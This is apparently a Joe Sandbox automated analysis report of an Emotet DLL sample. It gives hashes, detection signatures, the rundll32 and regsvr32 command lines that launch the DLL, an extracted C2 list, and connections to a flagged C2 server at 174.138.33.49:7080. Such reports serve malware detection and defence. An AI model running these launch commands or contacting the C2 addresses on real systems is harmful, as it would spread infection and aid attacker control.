Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MIpuuSiSZ4

Overview

General Information

Sample Name:MIpuuSiSZ4 (renamed file extension from none to dll)
Analysis ID:671702
MD5:1dd34935a785a419fb552b5086ea682e
SHA1:c6c966e4ba623f9972273de07b842ffbb9a9efce
SHA256:8b5a10f9a8f2b25057442111a01faf021ef7e048eab875a4078a44758d952c6f
Tags:exeOpenCTIBRSandboxed
Infos:

Detection

Emotet
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Tries to load missing DLLs
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Checks if the current process is being debugged
Registers a DLL
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll64.exe (PID: 7160 cmdline: loaddll64.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6376 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6160 cmdline: rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • WerFault.exe (PID: 6728 cmdline: C:\Windows\system32\WerFault.exe -u -p 6160 -s 336 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • regsvr32.exe (PID: 5016 cmdline: regsvr32.exe /s C:\Users\user\Desktop\MIpuuSiSZ4.dll MD5: D78B75FC68247E8A63ACBA846182740E)
      • regsvr32.exe (PID: 5696 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
    • rundll32.exe (PID: 3896 cmdline: rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddStroke MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 4412 cmdline: C:\Windows\system32\WerFault.exe -u -p 3896 -s 328 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 5804 cmdline: rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AddWordsToWordList MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 2196 cmdline: rundll32.exe C:\Users\user\Desktop\MIpuuSiSZ4.dll,AdviseInkChange MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 5428 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\YbTPHZsAWIZFUi\eAeQcUPg.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 3316 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6496 cmdline: C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • WerFault.exe (PID: 6568 cmdline: C:\Windows\system32\WerFault.exe -pss -s 516 -p 3896 -ip 3896 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • svchost.exe (PID: 6584 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4900 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5068 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5928 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7032 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6188 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
{"C2 list": ["192.168.2.7:2", "244.26.0.0:1", "240.69.242.0:2", "184.6.0.0:1", "64.6.0.0:1", "192.6.0.0:1", "244.6.0.0:1", "4.7.0.0:1", "20.7.0.0:1", "76.7.0.0:1", "92.7.0.0:1", "108.7.0.0:1", "112.7.0.0:1", "200.6.0.0:1", "16.7.0.0:1", "96.7.0.0:1", "124.7.0.0:1", "80.7.0.0:1", "128.7.0.0:1", "240.6.0.0:1", "32.7.0.0:1", "36.7.0.0:1", "214.112.3.0:5308", "241.112.3.0:5164", "243.112.3.0:1484"]}
SourceRuleDescriptionAuthorStrings
00000003.00000000.457523835.000001A6C0911000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000002.00000002.454942955.0000000001411000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000005.00000002.460329273.0000016A80010000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.500443188.000001A6C0911000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000C.00000002.883306468.0000000001000000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 18 entries
            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.1a6c08b0000.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.rundll32.exe.195c5870000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.0.rundll32.exe.1a6c08b0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  4.0.rundll32.exe.21313760000.3.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    12.2.regsvr32.exe.1000000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 17 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.7174.138.33.494979470802404316 07/22/22-13:58:44.263207
                      SID:2404316
                      Source Port:49794
                      Destination Port:7080
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: MIpuuSiSZ4.dllVirustotal: Detection: 72%Perma Link
                      Source: MIpuuSiSZ4.dllMetadefender: Detection: 54%Perma Link
                      Source: MIpuuSiSZ4.dllReversingLabs: Detection: 88%
                      Source: https://174.138.33.49/7Avira URL Cloud: Label: malware
                      Source: https://174.138.33.49:7080/temyAvira URL Cloud: Label: malware
                      Source: https://174.138.33.49:7080/NumvAvira URL Cloud: Label: malware
                      Source: 0000000C.00000003.792258520.0000000000F0F000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["192.168.2.7:2", "244.26.0.0:1", "240.69.242.0:2", "184.6.0.0:1", "64.6.0.0:1", "192.6.0.0:1", "244.6.0.0:1", "4.7.0.0:1", "20.7.0.0:1", "76.7.0.0:1", "92.7.0.0:1", "108.7.0.0:1", "112.7.0.0:1", "200.6.0.0:1", "16.7.0.0:1", "96.7.0.0:1", "124.7.0.0:1", "80.7.0.0:1", "128.7.0.0:1", "240.6.0.0:1", "32.7.0.0:1", "36.7.0.0:1", "214.112.3.0:5308", "241.112.3.0:5164", "243.112.3.0:1484"]}
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180042F88 FindFirstFileExW,0_2_0000000180042F88
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0000000180043464
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180042F88 FindFirstFileExW,2_2_0000000180042F88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0000000180043464
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0287C9F0 FindFirstFileW,FindNextFileW,12_2_0287C9F0

                      Networking

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 174.138.33.49 7080Jump to behavior
                      Source: TrafficSnort IDS: 2404316 ET CNC Feodo Tracker Reported CnC Server TCP group 9 192.168.2.7:49794 -> 174.138.33.49:7080
                      Source: Malware configuration extractorIPs: 192.168.2.7:2
                      Source: Malware configuration extractorIPs: 244.26.0.0:1
                      Source: Malware configuration extractorIPs: 240.69.242.0:2
                      Source: Malware configuration extractorIPs: 184.6.0.0:1
                      Source: Malware configuration extractorIPs: 64.6.0.0:1
                      Source: Malware configuration extractorIPs: 192.6.0.0:1
                      Source: Malware configuration extractorIPs: 244.6.0.0:1
                      Source: Malware configuration extractorIPs: 4.7.0.0:1
                      Source: Malware configuration extractorIPs: 20.7.0.0:1
                      Source: Malware configuration extractorIPs: 76.7.0.0:1
                      Source: Malware configuration extractorIPs: 92.7.0.0:1
                      Source: Malware configuration extractorIPs: 108.7.0.0:1
                      Source: Malware configuration extractorIPs: 112.7.0.0:1
                      Source: Malware configuration extractorIPs: 200.6.0.0:1
                      Source: Malware configuration extractorIPs: 16.7.0.0:1
                      Source: Malware configuration extractorIPs: 96.7.0.0:1
                      Source: Malware configuration extractorIPs: 124.7.0.0:1
                      Source: Malware configuration extractorIPs: 80.7.0.0:1
                      Source: Malware configuration extractorIPs: 128.7.0.0:1
                      Source: Malware configuration extractorIPs: 240.6.0.0:1
                      Source: Malware configuration extractorIPs: 32.7.0.0:1
                      Source: Malware configuration extractorIPs: 36.7.0.0:1
                      Source: Malware configuration extractorIPs: 214.112.3.0:5308
                      Source: Malware configuration extractorIPs: 241.112.3.0:5164
                      Source: Malware configuration extractorIPs: 243.112.3.0:1484
                      Source: Joe Sandbox ViewASN Name: ATGS-MMD-ASUS ATGS-MMD-ASUS
                      Source: Joe Sandbox ViewIP Address: 174.138.33.49 174.138.33.49
                      Source: global trafficTCP traffic: 192.168.2.7:49794 -> 174.138.33.49:7080
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: unknownTCP traffic detected without corresponding DNS query: 174.138.33.49
                      Source: regsvr32.exe, 0000000C.00000003.792258520.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.788408312.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.883040476.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.883963436.00000227B5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.740019918.0000014760705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000016.00000002.883963436.00000227B5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.739932682.000001475FCE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: regsvr32.exe, 0000000C.00000003.792258520.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.788408312.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.883040476.0000000000F0F000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 0000000C.00000003.563716950.0000000000F5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?ba3f020901819
                      Source: regsvr32.exe, 0000000C.00000003.565719065.000000000300D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.883662137.000000000302C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.565412953.0000000002FD1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.565930872.000000000302C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.caby
                      Source: svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000016.00000002.883340069.00000227AF8AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49/
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49/7
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49:7080/
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49:7080/Numv
                      Source: regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://174.138.33.49:7080/temy
                      Source: svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 0000001E.00000003.719101021.00000147607A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.718967987.00000147607B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.719233278.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.718937080.00000147607B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 0000000C.00000002.882519844.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.1a6c08b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.195c5870000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.1000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.21313760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1a6c08b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1942a5d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.16a80010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.16a80010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.195c5870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.13b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1942a5d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.21313760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.457523835.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454942955.0000000001411000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.460329273.0000016A80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.500443188.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.883306468.0000000001000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.503233757.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.460399040.0000016A80071000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.883481925.0000000002861000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.499993940.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.458204040.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.468293754.00000195C58D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.457983091.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.457466014.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454887422.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.448855621.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.454361313.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.448792384.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.468234789.00000195C5870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.454167344.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.503043476.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.488528971.000001942A5D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160
                      Source: C:\Windows\System32\regsvr32.exeFile deleted: C:\Windows\System32\FmCnbLJkOlaRytmc\QMbXoKRooU.dll:Zone.IdentifierJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeFile created: C:\Windows\system32\YbTPHZsAWIZFUi\Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001A0980_2_000000018001A098
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018003E0D00_2_000000018003E0D0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800180E00_2_00000001800180E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C0F40_2_000000018001C0F4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E1340_2_000000018001E134
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002C1500_2_000000018002C150
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001A1A00_2_000000018001A1A0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004E1C00_2_000000018004E1C0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800181E40_2_00000001800181E4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800262880_2_0000000180026288
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001A2A80_2_000000018001A2A8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800182E80_2_00000001800182E8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E3200_2_000000018001E320
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C3240_2_000000018001C324
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800583380_2_0000000180058338
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001A3B40_2_000000018001A3B4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800063E00_2_00000001800063E0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800183F00_2_00000001800183F0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002E4200_2_000000018002E420
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E5080_2_000000018001E508
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C5100_2_000000018001C510
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800285140_2_0000000180028514
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002C51C0_2_000000018002C51C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800185480_2_0000000180018548
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018005A5A40_2_000000018005A5A4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800266180_2_0000000180026618
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800186500_2_0000000180018650
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800286680_2_0000000180028668
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004067C0_2_000000018004067C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018004E6F00_2_000000018004E6F0
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C6FC0_2_000000018001C6FC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E7340_2_000000018001E734
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800187580_2_0000000180018758
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800287E40_2_00000001800287E4
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800188600_2_0000000180018860
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800168700_2_0000000180016870
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800548F80_2_00000001800548F8
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018002C9000_2_000000018002C900
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001E91C0_2_000000018001E91C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001C92C0_2_000000018001C92C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800169780_2_0000000180016978
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800189CC0_2_00000001800189CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180026A240_2_0000000180026A24
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180016A800_2_0000000180016A80
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001EB040_2_000000018001EB04
